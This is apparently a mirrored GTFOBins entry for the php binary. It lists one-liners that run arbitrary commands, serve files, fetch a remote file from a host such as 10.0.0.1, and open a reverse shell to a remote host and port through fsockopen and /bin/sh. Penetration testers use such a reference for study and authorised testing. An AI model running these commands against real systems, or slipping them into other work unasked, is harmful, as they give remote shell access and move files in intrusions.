1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-07 08:06:05 +02:00
GTFOBins.github.io/_gtfobins/php.md
2018-05-21 20:14:41 +01:00

1.5 KiB

functions
exec-non-interactive upload download reverse-shell
code
export CMD="ls /" php -r 'system($_ENV["CMD"]);'
code
export CMD="ls /" php -r 'passthru($_ENV["CMD"]);'
code
export CMD="ls /" php -r 'print(shell_exec($_ENV["CMD"]));'
code
export CMD="ls /" php -r '$r=array(); exec($_ENV["CMD"], $r); print(join("\n",$r));'
code
export CMD="ls /" php -r '$h=@popen($_ENV["CMD"],"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
code
export CMD="ls /" php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open($_ENV["CMD"], $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
description code
Serve files in the local folder running an HTTP server. LHOST=0.0.0.0 LPORT=8888 php -S $LHOST:$LPORT
description code
Fetch a remote file via HTTP GET request. export URL=http://10.0.0.1/file_to_get export LFILE=file_to_get php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);'
code
export RHOST=127.0.0.1 export RPORT=8000 php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'